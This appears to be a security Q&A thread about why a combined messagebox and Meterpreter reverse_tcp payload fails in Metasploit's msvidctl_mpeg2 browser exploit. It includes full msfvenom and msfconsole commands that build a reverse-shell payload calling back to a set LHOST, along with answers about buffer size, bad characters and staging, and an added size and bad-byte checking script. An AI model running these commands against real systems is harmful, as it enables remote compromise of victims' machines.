Metasploit generic/custom payload with a multipayload

I started playing with the multipayload support in the new MSF4 (Framework: 4.1.0-release.13988, Console: 4.1.0-release.13581) using msfvenom and the custom/generic payload, and I'm looking for information on that payload in terms of encoding and compatibility.

Basically I'm looking at how a server-side service gets shut down, so that meterpreter can afterwards listen on the port that was bound. (the exploit lands on a different port)

Essentially, I created a msgbox and Meterpreter multipayload with msfvenom, as exe, raw and .rb. I tried leaving the encoding setting alone and also setting it to none. (the custom/generic payload .rb source says that only no encoding is allowed)

c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom  -p windows/messagebox -f raw -e generic/none EXITFUNC=thread > test\msgbox.raw
c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom -p windows/meterpreter/reverse_tcp -f raw -e generic/none -t test/msgbox.raw -k LHOST=192.168.1.100 EXITFUNC=thread > test\msgterp.raw

I also set EXITFUNC to "none".

c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom  -p windows/messagebox -f raw -e generic/none EXITFUNC=none > test\msgbox.raw
c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom -p windows/meterpreter/reverse_tcp -f raw -e generic/none -t test/msgbox.raw -k LHOST=192.168.1.100 EXITFUNC=none> test\msgterp.raw

Then the raw multipayload file has to be written out to payloads that generic/custom can use: (I tried writing to raw, exe and .rb formats)

c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom -p - -f exe > msf.exe < test\\msgterp.raw

Finally, time to test the multipayload with generic/custom: (remember that the exploit was reloaded each time before setting and exploiting)

msf > use exploit/windows/browser/msvidctl_mpeg2
msf  exploit(msvidctl_mpeg2) > set PAYLOAD generic/custom
PAYLOAD => generic/custom

msf  exploit(msvidctl_mpeg2) > set PAYLOADSTR c:\\metasploit\\test\\msf.raw
PAYLOADSTR => c:\metasploit\test\msf.raw
msf  exploit(msvidctl_mpeg2) > exploit

[-] Exploit failed: No encoders encoded the buffer successfully.

msf  exploit(msvidctl_mpeg2) > set PAYLOADSTR c:\\metasploit\\test\\msf.exe
PAYLOADSTR => c:\metasploit\test\msf.exe
msf  exploit(msvidctl_mpeg2) > exploit

[-] Exploit failed: No encoders encoded the buffer successfully.

msf  exploit(msvidctl_mpeg2) > set PAYLOADFILE c:\\metasploit\\test\\msf.raw
PAYLOADFILE => c:\metasploit\test\msf.raw
msf  exploit(msvidctl_mpeg2) > exploit

[-] Exploit failed: No encoders encoded the buffer successfully.

msf  exploit(msvidctl_mpeg2) > set PAYLOADFILE c:\\metasploit\\test\\msf.exe
PAYLOADFILE => c:\metasploit\test\msf.exe
msf  exploit(msvidctl_mpeg2) > exploit

[-] Exploit failed: No encoders encoded the buffer successfully.

So I found out what the error "No encoders encoded ..." means. (http://en.wikibooks.org/wiki/Metasploit/Frequently_Asked_Questions) That reference is useful here.

Is the cause of the error that the windows/msgbox payload was loaded? Or that multipayloads were loaded? If the latter, then I don't understand how multipayloads work. Combining 2 payloads will probably be larger than a single payload.

Can someone explain which encodings and formats are compatible with the generic/custom payload? I've only found a few links on multipayload support.

Thanks in advance! Once I get this working, I promise to answer back with how I got it working.

0

2 Answers

Sorry for the late answer.

In MSF 4.1 this was a bug related to msfvenom, not the generic/custom payload. The payloads I generated were larger than 1024 bytes. There is a thread where HDM himself indicates that this is a bug.

https://community.rapid7.com/thread/1332

The bug case that came with the fix for msfvenom:

http://dev.metasploit.com/redmine/issues/4714

I don't think it was only the multipayload support. Don't mind my ridiculous earlier use of msfvenom. By the time I posted this question I was desperate, so I was thinking about this before starting to write shellcode. When HDM acknowledged the bug, I decided to go another route and started learning to write a 2-in-1 shellcode test. (I grabbed an MSF Pro trial and set up a VPN pivot to solve the multi-hop test scenario)

Thanks for the answer.

1

I think it would be useful for you to understand some exploit dynamics and classic memory corruption exploitation strategies.

May I suggest The Art of Software Security Assessment or The Shellcoder's Handbook.

That said, here is what is happening. When you 'cave' out memory in a buffer overflow, you have a limited amount of space available for your exploit before you hit the stored stack frame and instruction pointer. The MPEG2 browser bug (which you are trying to exploit) allocates 1024 bytes on the stack, which is thus the limit of your payload; as well, it is terminated by the standard series (\x00\x09\x0a\x0d, that's null char, stop, carriage return, and line feed respectively), which further limits you to any shellcode which is not written with this in mind.

Metasploit is quite clever and can usually swap some instructions for "safe" yet still exploitable instructions, but this is not always possible; there can be instruction set conflicts, assembly blow-ups, and so on. msfvenom's payload generators "work" against Metasploit, and Metasploit lets the errors through.

As you guessed, this means your shellcode (err, I mean payload) needs to be staged. A well-staged payload is usually logical (iterative) enough that it can be scattered across many memory locations and automatically reassemble itself, using what is called egg hunting. If I were in your shoes, I would use the generic exploit with *windows/meterpreter/reverse_tcp*, because I don't think this particular exploit is going to handle anything simple or mixed.

Best of luck.

1
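The answer above names two constraints that explain why "No encoders encoded the buffer successfully" shows up for this exploit: a 1024-byte stack buffer and the terminator bytes \x00\x09\x0a\x0d. The following is an added example (not code from the thread, Metasploit, or its authors) that checks a raw payload blob against exactly those two constraints and reports where it breaks them, so a tester can see in advance whether a generated blob could ever fit. The size limit, the bad-character set and the sample blobs are constructed for illustration and stand in for whatever the real exploit module requires.

```python
"""Report whether a raw payload blob fits a fixed stack buffer and avoids
terminator bytes.  Added example; the limit and terminator set below are
taken from the answer's description, the sample blobs are constructed."""
from dataclasses import dataclass
from typing import Dict, Optional

STACK_LIMIT = 1024                    # bytes available on the stack (from the answer)
BAD_CHARS = b"\x00\x09\x0a\x0d"       # bytes that terminate the copy (from the answer)


@dataclass
class PayloadReport:
    length: int
    limit: int
    bad_char_offsets: Dict[int, int]  # offset -> offending byte value

    @property
    def fits(self) -> bool:
        return self.length <= self.limit

    @property
    def clean(self) -> bool:
        return not self.bad_char_offsets

    @property
    def usable(self) -> bool:
        return self.fits and self.clean

    def explain(self) -> str:
        lines = [f"length {self.length} / limit {self.limit}: "
                 f"{'ok' if self.fits else 'TOO LONG by ' + str(self.length - self.limit)}"]
        if self.clean:
            lines.append("no terminator bytes found")
        else:
            for off, val in sorted(self.bad_char_offsets.items()):
                lines.append(f"terminator byte 0x{val:02x} at offset {off}")
        return "\n".join(lines)


def check_payload(blob: bytes, limit: int = STACK_LIMIT,
                  bad_chars: bytes = BAD_CHARS) -> PayloadReport:
    """Scan every byte once; record offsets of bytes in the terminator set."""
    offsets = {i: b for i, b in enumerate(blob) if b in bad_chars}
    return PayloadReport(len(blob), limit, offsets)


def first_terminator(blob: bytes, bad_chars: bytes = BAD_CHARS) -> Optional[int]:
    """Offset at which a string-style copy of the blob would stop, or None.
    Everything after this offset never reaches the target buffer."""
    report = check_payload(blob, limit=len(blob), bad_chars=bad_chars)
    return min(report.bad_char_offsets) if report.bad_char_offsets else None


def check_payload_file(path: str, limit: int = STACK_LIMIT,
                       bad_chars: bytes = BAD_CHARS) -> PayloadReport:
    """Same check on a raw file such as the msfvenom -f raw output above."""
    with open(path, "rb") as fh:
        return check_payload(fh.read(), limit, bad_chars)


# Constructed sample blobs (not real Metasploit output):
SMALL_CLEAN = bytes(range(1, 9)) * 4           # 32 bytes, none of them terminators
WITH_BAD = b"\x90\x90\x0a\x41\x00"             # line feed at 2, null at 4
TOO_BIG = b"\x41" * 1500                       # clean bytes but larger than the buffer

if __name__ == "__main__":
    for name, blob in (("small_clean", SMALL_CLEAN), ("with_bad", WITH_BAD),
                       ("too_big", TOO_BIG)):
        print(f"== {name}")
        print(check_payload(blob).explain())
        print("copy would stop at:", first_terminator(blob))
```

Run it directly to see the three reports, or call `check_payload_file` on the `.raw` files produced by msfvenom above. A multipayload that concatenates two stages will typically fail the length check alone, which is the situation the accepted answer describes; a single stage that passes the length check can still be cut short at the first terminator byte, which is what the second answer's bad-character list is about.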